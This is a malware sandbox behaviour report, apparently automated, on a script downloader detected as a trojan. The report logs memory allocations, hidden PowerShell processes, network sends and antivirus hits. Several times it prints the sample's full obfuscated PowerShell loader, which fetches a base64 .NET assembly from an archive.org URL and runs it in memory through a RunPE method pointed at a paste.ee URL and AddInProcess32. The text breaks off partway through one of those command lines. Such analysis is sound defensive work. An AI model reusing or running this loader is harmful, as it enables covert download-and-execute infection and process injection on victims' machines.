NtAllocateVirtualMemory Sept. 24, 2024, 10:49 a.m.	process_identifier: 2652 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02675000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 24, 2024, 10:49 a.m.	process_identifier: 2652 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026dc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 24, 2024, 10:49 a.m.	process_identifier: 2652 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 24, 2024, 10:49 a.m.	process_identifier: 2652 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02676000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 24, 2024, 10:49 a.m.	process_identifier: 2652 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026ec000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 24, 2024, 10:49 a.m.	process_identifier: 2652 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026d3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 24, 2024, 10:49 a.m.	process_identifier: 2652 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026d4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 24, 2024, 10:49 a.m.	process_identifier: 2652 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026d5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 24, 2024, 10:49 a.m.	process_identifier: 2652 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026d6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 24, 2024, 10:49 a.m.	process_identifier: 2652 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026d7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 24, 2024, 10:49 a.m.	process_identifier: 2652 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026d8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 24, 2024, 10:49 a.m.	process_identifier: 2652 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026d9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 24, 2024, 10:49 a.m.	process_identifier: 2652 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02910000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 24, 2024, 10:49 a.m.	process_identifier: 2652 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02911000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 24, 2024, 10:49 a.m.	process_identifier: 2652 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02912000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 24, 2024, 10:49 a.m.	process_identifier: 2652 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02913000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 24, 2024, 10:49 a.m.	process_identifier: 2652 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02914000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 24, 2024, 10:49 a.m.	process_identifier: 2652 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02915000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 24, 2024, 10:49 a.m.	process_identifier: 2652 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02916000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 24, 2024, 10:49 a.m.	process_identifier: 2652 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02917000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 24, 2024, 10:49 a.m.	process_identifier: 2652 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02918000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 24, 2024, 10:49 a.m.	process_identifier: 2652 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02919000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 24, 2024, 10:49 a.m.	process_identifier: 2652 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0291a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 24, 2024, 10:49 a.m.	process_identifier: 2652 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0291b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 24, 2024, 10:49 a.m.	process_identifier: 2652 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0291c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 24, 2024, 10:49 a.m.	process_identifier: 2652 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0291d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 24, 2024, 10:49 a.m.	process_identifier: 2652 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0291e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 24, 2024, 10:49 a.m.	process_identifier: 2652 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0291f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 24, 2024, 10:49 a.m.	process_identifier: 2652 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a90000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 24, 2024, 10:49 a.m.	process_identifier: 2652 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a91000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 24, 2024, 10:49 a.m.	process_identifier: 2652 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a92000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 24, 2024, 10:49 a.m.	process_identifier: 2652 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a93000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 24, 2024, 10:49 a.m.	process_identifier: 2652 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a94000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (3 events)

cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoKFZBUklhQkxlICcqTURyKicpLm5hTWVbMywxMSwyXS1qT2lOJycpKCAoJ3cxJysnWnVybCA9IFZ3M2h0dHAnKydzOi8vJysnaScrJ2E2JysnMDAxMDAudXMuYXJjaGl2ZS5vcmcnKycvMjQnKycvaScrJ3RlbXMvZGV0JysnYWgtJysnbm90ZS12LycrJ0RldGFoTm8nKyd0ZVYudHgnKyd0VnczOycrJ3cxWmJhc2U2JysnNEMnKydvbnRlJysnbnQgPSAoTmV3JysnLU9iaicrJ2VjdCAnKydTeScrJ3N0ZW0uTmV0JysnLlcnKydlYkNsaWVudCkuRG93bmxvYWRTJysndHJpbmcnKycodzFadXJsKTt3JysnMVpiJysnaW4nKydhcicrJ3lDb250ZW50ID0gWycrJ1N5Jysnc3RlbS5DJysnb24nKyd2JysnZXJ0JysnXTo6RicrJ3InKydvbUJhcycrJ2U2NFN0cmluZycrJyh3MVpiYXNlNicrJzRDb250ZScrJ250KTt3MVphc3NlbWJseSA9IFsnKydSZWZsZWN0JysnaScrJ29uLkFzJysnc2VtYmx5XScrJzo6TG9hZCcrJygnKyd3MVonKydiaW5hcnlDb24nKyd0ZW50JysnKTt3MVp0JysneXBlID0gdzFaYXNzJysnZW1iJysnbHkuR2V0VHlwJysnZShWdzMnKydSdScrJ25QRS4nKydIb21lJysnVnczKTt3JysnMVptZXRob2QgPSB3JysnMVonKyd0eScrJ3BlLkdldE1ldGhvZChWdzNWQUlWdzMpO3cxWm0nKydldGgnKydvZCcrJy5JbnZva2UodycrJzFabnVsbCwgJysnWycrJ29iamVjdFtdJysnXUAoVicrJ3czMC9wV2NKJysnbicrJy9kLycrJ2UnKydlLmV0c2FwLy86c3B0dGhWdzMgLCcrJyBWdzNkZXNhdGl2YScrJ2RvVnczICwgJysnVicrJ3czZGVzYXRpdmFkbycrJ1Z3JysnMyAsJysnIFZ3M2QnKydlcycrJ2EnKyd0aXZhZG9WJysndzMsVncnKyczQWRkSW5QJysncicrJ28nKydjZXNzMzJWdzMsJysnVicrJ3czVnczKSknKS5yZXBsQWNlKCdWdzMnLFtzVHJJTkddW0NIYVJdMzkpLnJlcGxBY2UoJ3cxWicsJyQnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ((VARIaBLe 'MDr').naMe[3,11,2]-jOiN'')( ('w1'+'Zurl = Vw3http'+'s://'+'i'+'a6'+'00100.us.archive.org'+'/24'+'/i'+'tems/det'+'ah-'+'note-v/'+'DetahNo'+'teV.tx'+'tVw3;'+'w1Zbase6'+'4C'+'onte'+'nt = (New'+'-Obj'+'ect '+'Sy'+'stem.Net'+'.W'+'ebClient).DownloadS'+'tring'+'(w1Zurl);w'+'1Zb'+'in'+'ar'+'yContent = ['+'Sy'+'stem.C'+'on'+'v'+'ert'+']::F'+'r'+'omBas'+'e64String'+'(w1Zbase6'+'4Conte'+'nt);w1Zassembly = ['+'Reflect'+'i'+'on.As'+'sembly]'+'::Load'+'('+'w1Z'+'binaryCon'+'tent'+');w1Zt'+'ype = w1Zass'+'emb'+'ly.GetTyp'+'e(Vw3'+'Ru'+'nPE.'+'Home'+'Vw3);w'+'1Zmethod = w'+'1Z'+'ty'+'pe.GetMethod(Vw3VAIVw3);w1Zm'+'eth'+'od'+'.Invoke(w'+'1Znull, '+'['+'object[]'+']@(V'+'w30/pWcJ'+'n'+'/d/'+'e'+'e.etsap//:sptthVw3 ,'+' Vw3desativa'+'doVw3 , '+'V'+'w3desativado'+'Vw'+'3 ,'+' Vw3d'+'es'+'a'+'tivadoV'+'w3,Vw'+'3AddInP'+'r'+'o'+'cess32Vw3,'+'V'+'w3Vw3))').replAce('Vw3',[sTrING][CHaR]39).replAce('w1Z','$'))"
cmdline	powershell -command $Codigo = 'JiAoKFZBUklhQkxlICcqTURyKicpLm5hTWVbMywxMSwyXS1qT2lOJycpKCAoJ3cxJysnWnVybCA9IFZ3M2h0dHAnKydzOi8vJysnaScrJ2E2JysnMDAxMDAudXMuYXJjaGl2ZS5vcmcnKycvMjQnKycvaScrJ3RlbXMvZGV0JysnYWgtJysnbm90ZS12LycrJ0RldGFoTm8nKyd0ZVYudHgnKyd0VnczOycrJ3cxWmJhc2U2JysnNEMnKydvbnRlJysnbnQgPSAoTmV3JysnLU9iaicrJ2VjdCAnKydTeScrJ3N0ZW0uTmV0JysnLlcnKydlYkNsaWVudCkuRG93bmxvYWRTJysndHJpbmcnKycodzFadXJsKTt3JysnMVpiJysnaW4nKydhcicrJ3lDb250ZW50ID0gWycrJ1N5Jysnc3RlbS5DJysnb24nKyd2JysnZXJ0JysnXTo6RicrJ3InKydvbUJhcycrJ2U2NFN0cmluZycrJyh3MVpiYXNlNicrJzRDb250ZScrJ250KTt3MVphc3NlbWJseSA9IFsnKydSZWZsZWN0JysnaScrJ29uLkFzJysnc2VtYmx5XScrJzo6TG9hZCcrJygnKyd3MVonKydiaW5hcnlDb24nKyd0ZW50JysnKTt3MVp0JysneXBlID0gdzFaYXNzJysnZW1iJysnbHkuR2V0VHlwJysnZShWdzMnKydSdScrJ25QRS4nKydIb21lJysnVnczKTt3JysnMVptZXRob2QgPSB3JysnMVonKyd0eScrJ3BlLkdldE1ldGhvZChWdzNWQUlWdzMpO3cxWm0nKydldGgnKydvZCcrJy5JbnZva2UodycrJzFabnVsbCwgJysnWycrJ29iamVjdFtdJysnXUAoVicrJ3czMC9wV2NKJysnbicrJy9kLycrJ2UnKydlLmV0c2FwLy86c3B0dGhWdzMgLCcrJyBWdzNkZXNhdGl2YScrJ2RvVnczICwgJysnVicrJ3czZGVzYXRpdmFkbycrJ1Z3JysnMyAsJysnIFZ3M2QnKydlcycrJ2EnKyd0aXZhZG9WJysndzMsVncnKyczQWRkSW5QJysncicrJ28nKydjZXNzMzJWdzMsJysnVicrJ3czVnczKSknKS5yZXBsQWNlKCdWdzMnLFtzVHJJTkddW0NIYVJdMzkpLnJlcGxBY2UoJ3cxWicsJyQnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD

A process created a hidden window (3 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW Sept. 24, 2024, 10:49 a.m.	thread_identifier: 2656 thread_handle: 0x000002e8 process_identifier: 2652 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoKFZBUklhQkxlICcqTURyKicpLm5hTWVbMywxMSwyXS1qT2lOJycpKCAoJ3cxJysnWnVybCA9IFZ3M2h0dHAnKydzOi8vJysnaScrJ2E2JysnMDAxMDAudXMuYXJjaGl2ZS5vcmcnKycvMjQnKycvaScrJ3RlbXMvZGV0JysnYWgtJysnbm90ZS12LycrJ0RldGFoTm8nKyd0ZVYudHgnKyd0VnczOycrJ3cxWmJhc2U2JysnNEMnKydvbnRlJysnbnQgPSAoTmV3JysnLU9iaicrJ2VjdCAnKydTeScrJ3N0ZW0uTmV0JysnLlcnKydlYkNsaWVudCkuRG93bmxvYWRTJysndHJpbmcnKycodzFadXJsKTt3JysnMVpiJysnaW4nKydhcicrJ3lDb250ZW50ID0gWycrJ1N5Jysnc3RlbS5DJysnb24nKyd2JysnZXJ0JysnXTo6RicrJ3InKydvbUJhcycrJ2U2NFN0cmluZycrJyh3MVpiYXNlNicrJzRDb250ZScrJ250KTt3MVphc3NlbWJseSA9IFsnKydSZWZsZWN0JysnaScrJ29uLkFzJysnc2VtYmx5XScrJzo6TG9hZCcrJygnKyd3MVonKydiaW5hcnlDb24nKyd0ZW50JysnKTt3MVp0JysneXBlID0gdzFaYXNzJysnZW1iJysnbHkuR2V0VHlwJysnZShWdzMnKydSdScrJ25QRS4nKydIb21lJysnVnczKTt3JysnMVptZXRob2QgPSB3JysnMVonKyd0eScrJ3BlLkdldE1ldGhvZChWdzNWQUlWdzMpO3cxWm0nKydldGgnKydvZCcrJy5JbnZva2UodycrJzFabnVsbCwgJysnWycrJ29iamVjdFtdJysnXUAoVicrJ3czMC9wV2NKJysnbicrJy9kLycrJ2UnKydlLmV0c2FwLy86c3B0dGhWdzMgLCcrJyBWdzNkZXNhdGl2YScrJ2RvVnczICwgJysnVicrJ3czZGVzYXRpdmFkbycrJ1Z3JysnMyAsJysnIFZ3M2QnKydlcycrJ2EnKyd0aXZhZG9WJysndzMsVncnKyczQWRkSW5QJysncicrJ28nKydjZXNzMzJWdzMsJysnVicrJ3czVnczKSknKS5yZXBsQWNlKCdWdzMnLFtzVHJJTkddW0NIYVJdMzkpLnJlcGxBY2UoJ3cxWicsJyQnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002f0	1	1
ShellExecuteExW Sept. 24, 2024, 10:49 a.m.	show_type: 0 filepath_r: powershell parameters: -command $Codigo = 'JiAoKFZBUklhQkxlICcqTURyKicpLm5hTWVbMywxMSwyXS1qT2lOJycpKCAoJ3cxJysnWnVybCA9IFZ3M2h0dHAnKydzOi8vJysnaScrJ2E2JysnMDAxMDAudXMuYXJjaGl2ZS5vcmcnKycvMjQnKycvaScrJ3RlbXMvZGV0JysnYWgtJysnbm90ZS12LycrJ0RldGFoTm8nKyd0ZVYudHgnKyd0VnczOycrJ3cxWmJhc2U2JysnNEMnKydvbnRlJysnbnQgPSAoTmV3JysnLU9iaicrJ2VjdCAnKydTeScrJ3N0ZW0uTmV0JysnLlcnKydlYkNsaWVudCkuRG93bmxvYWRTJysndHJpbmcnKycodzFadXJsKTt3JysnMVpiJysnaW4nKydhcicrJ3lDb250ZW50ID0gWycrJ1N5Jysnc3RlbS5DJysnb24nKyd2JysnZXJ0JysnXTo6RicrJ3InKydvbUJhcycrJ2U2NFN0cmluZycrJyh3MVpiYXNlNicrJzRDb250ZScrJ250KTt3MVphc3NlbWJseSA9IFsnKydSZWZsZWN0JysnaScrJ29uLkFzJysnc2VtYmx5XScrJzo6TG9hZCcrJygnKyd3MVonKydiaW5hcnlDb24nKyd0ZW50JysnKTt3MVp0JysneXBlID0gdzFaYXNzJysnZW1iJysnbHkuR2V0VHlwJysnZShWdzMnKydSdScrJ25QRS4nKydIb21lJysnVnczKTt3JysnMVptZXRob2QgPSB3JysnMVonKyd0eScrJ3BlLkdldE1ldGhvZChWdzNWQUlWdzMpO3cxWm0nKydldGgnKydvZCcrJy5JbnZva2UodycrJzFabnVsbCwgJysnWycrJ29iamVjdFtdJysnXUAoVicrJ3czMC9wV2NKJysnbicrJy9kLycrJ2UnKydlLmV0c2FwLy86c3B0dGhWdzMgLCcrJyBWdzNkZXNhdGl2YScrJ2RvVnczICwgJysnVicrJ3czZGVzYXRpdmFkbycrJ1Z3JysnMyAsJysnIFZ3M2QnKydlcycrJ2EnKyd0aXZhZG9WJysndzMsVncnKyczQWRkSW5QJysncicrJ28nKydjZXNzMzJWdzMsJysnVicrJ3czVnczKSknKS5yZXBsQWNlKCdWdzMnLFtzVHJJTkddW0NIYVJdMzkpLnJlcGxBY2UoJ3cxWicsJyQnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD filepath: powershell	1	1
CreateProcessInternalW Sept. 24, 2024, 10:49 a.m.	thread_identifier: 2788 thread_handle: 0x0000044c process_identifier: 2784 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ((VARIaBLe 'MDr').naMe[3,11,2]-jOiN'')( ('w1'+'Zurl = Vw3http'+'s://'+'i'+'a6'+'00100.us.archive.org'+'/24'+'/i'+'tems/det'+'ah-'+'note-v/'+'DetahNo'+'teV.tx'+'tVw3;'+'w1Zbase6'+'4C'+'onte'+'nt = (New'+'-Obj'+'ect '+'Sy'+'stem.Net'+'.W'+'ebClient).DownloadS'+'tring'+'(w1Zurl);w'+'1Zb'+'in'+'ar'+'yContent = ['+'Sy'+'stem.C'+'on'+'v'+'ert'+']::F'+'r'+'omBas'+'e64String'+'(w1Zbase6'+'4Conte'+'nt);w1Zassembly = ['+'Reflect'+'i'+'on.As'+'sembly]'+'::Load'+'('+'w1Z'+'binaryCon'+'tent'+');w1Zt'+'ype = w1Zass'+'emb'+'ly.GetTyp'+'e(Vw3'+'Ru'+'nPE.'+'Home'+'Vw3);w'+'1Zmethod = w'+'1Z'+'ty'+'pe.GetMethod(Vw3VAIVw3);w1Zm'+'eth'+'od'+'.Invoke(w'+'1Znull, '+'['+'object[]'+']@(V'+'w30/pWcJ'+'n'+'/d/'+'e'+'e.etsap//:sptthVw3 ,'+' Vw3desativa'+'doVw3 , '+'V'+'w3desativado'+'Vw'+'3 ,'+' Vw3d'+'es'+'a'+'tivadoV'+'w3,Vw'+'3AddInP'+'r'+'o'+'cess32Vw3,'+'V'+'w3Vw3))').replAce('Vw3',[sTrING][CHaR]39).replAce('w1Z','$'))" filepath_r: stack_pivoted: 0 creation_flags: 0 () inherit_handles: 1 process_handle: 0x00000450	1	1

File has been identified by 4 AntiVirus engines on VirusTotal as malicious (4 events)

Symantec	CL.Downloader!gen11
Kaspersky	HEUR:Trojan.Script.Generic
Ikarus	Trojan-Downloader.VBS.Agent
Google	Detected

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Sept. 24, 2024, 10:49 a.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (2 events)

Data received
Data received	F

Poweshell is sending data to a remote host (2 events)

Data sent	zvfò·Ûºús&åÍEéÚ 6uÕ¬,âëíô/5 ÀÀÀ À 285ÿia600100.us.archive.org
Data sent	zvfò·ª-Xú¥a°= ìêªX¯Ì$ä qà/5 ÀÀÀ À 285ÿia600100.us.archive.org

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Sept. 24, 2024, 10:49 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW Sept. 24, 2024, 10:49 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (2 events)

Time & API	Arguments	Status	Return	Repeated
send Sept. 24, 2024, 10:49 a.m.	buffer: zvfò·Ûºús&åÍEéÚ 6uÕ¬,âëíô/5 ÀÀÀ À 285ÿia600100.us.archive.org socket: 1440 sent: 127	1	127	0
send Sept. 24, 2024, 10:49 a.m.	buffer: zvfò·ª-Xú¥a°= ìêªX¯Ì$ä qà/5 ÀÀÀ À 285ÿia600100.us.archive.org socket: 1440 sent: 127	1	127	0

One or more non-whitelisted processes were created (3 events)

parent_process	powershell.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ((VARIaBLe 'MDr').naMe[3,11,2]-jOiN'')( ('w1'+'Zurl = Vw3http'+'s://'+'i'+'a6'+'00100.us.archive.org'+'/24'+'/i'+'tems/det'+'ah-'+'note-v/'+'DetahNo'+'teV.tx'+'tVw3;'+'w1Zbase6'+'4C'+'onte'+'nt = (New'+'-Obj'+'ect '+'Sy'+'stem.Net'+'.W'+'ebClient).DownloadS'+'tring'+'(w1Zurl);w'+'1Zb'+'in'+'ar'+'yContent = ['+'Sy'+'stem.C'+'on'+'v'+'ert'+']::F'+'r'+'omBas'+'e64String'+'(w1Zbase6'+'4Conte'+'nt);w1Zassembly = ['+'Reflect'+'i'+'on.As'+'sembly]'+'::Load'+'('+'w1Z'+'binaryCon'+'tent'+');w1Zt'+'ype = w1Zass'+'emb'+'ly.GetTyp'+'e(Vw3'+'Ru'+'nPE.'+'Home'+'Vw3);w'+'1Zmethod = w'+'1Z'+'ty'+'pe.GetMethod(Vw3VAIVw3);w1Zm'+'eth'+'od'+'.Invoke(w'+'1Znull, '+'['+'object[]'+']@(V'+'w30/pWcJ'+'n'+'/d/'+'e'+'e.etsap//:sptthVw3 ,'+' Vw3desativa'+'doVw3 , '+'V'+'w3desativado'+'Vw'+'3 ,'+' Vw3d'+'es'+'a'+'tivadoV'+'w3,Vw'+'3AddInP'+'r'+'o'+'cess32Vw3,'+'V'+'w3Vw3))').replAce('Vw3',[sTrING][CHaR]39).replAce('w1Z','$'))"
parent_process	wscript.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoKFZBUklhQkxlICcqTURyKicpLm5hTWVbMywxMSwyXS1qT2lOJycpKCAoJ3cxJysnWnVybCA9IFZ3M2h0dHAnKydzOi8vJysnaScrJ2E2JysnMDAxMDAudXMuYXJjaGl2ZS5vcmcnKycvMjQnKycvaScrJ3RlbXMvZGV0JysnYWgtJysnbm90ZS12LycrJ0RldGFoTm8nKyd0ZVYudHgnKyd0VnczOycrJ3cxWmJhc2U2JysnNEMnKydvbnRlJysnbnQgPSAoTmV3JysnLU9iaicrJ2VjdCAnKydTeScrJ3N0ZW0uTmV0JysnLlcnKydlYkNsaWVudCkuRG93bmxvYWRTJysndHJpbmcnKycodzFadXJsKTt3JysnMVpiJysnaW4nKydhcicrJ3lDb250ZW50ID0gWycrJ1N5Jysnc3RlbS5DJysnb24nKyd2JysnZXJ0JysnXTo6RicrJ3InKydvbUJhcycrJ2U2NFN0cmluZycrJyh3MVpiYXNlNicrJzRDb250ZScrJ250KTt3MVphc3NlbWJseSA9IFsnKydSZWZsZWN0JysnaScrJ29uLkFzJysnc2VtYmx5XScrJzo6TG9hZCcrJygnKyd3MVonKydiaW5hcnlDb24nKyd0ZW50JysnKTt3MVp0JysneXBlID0gdzFaYXNzJysnZW1iJysnbHkuR2V0VHlwJysnZShWdzMnKydSdScrJ25QRS4nKydIb21lJysnVnczKTt3JysnMVptZXRob2QgPSB3JysnMVonKyd0eScrJ3BlLkdldE1ldGhvZChWdzNWQUlWdzMpO3cxWm0nKydldGgnKydvZCcrJy5JbnZva2UodycrJzF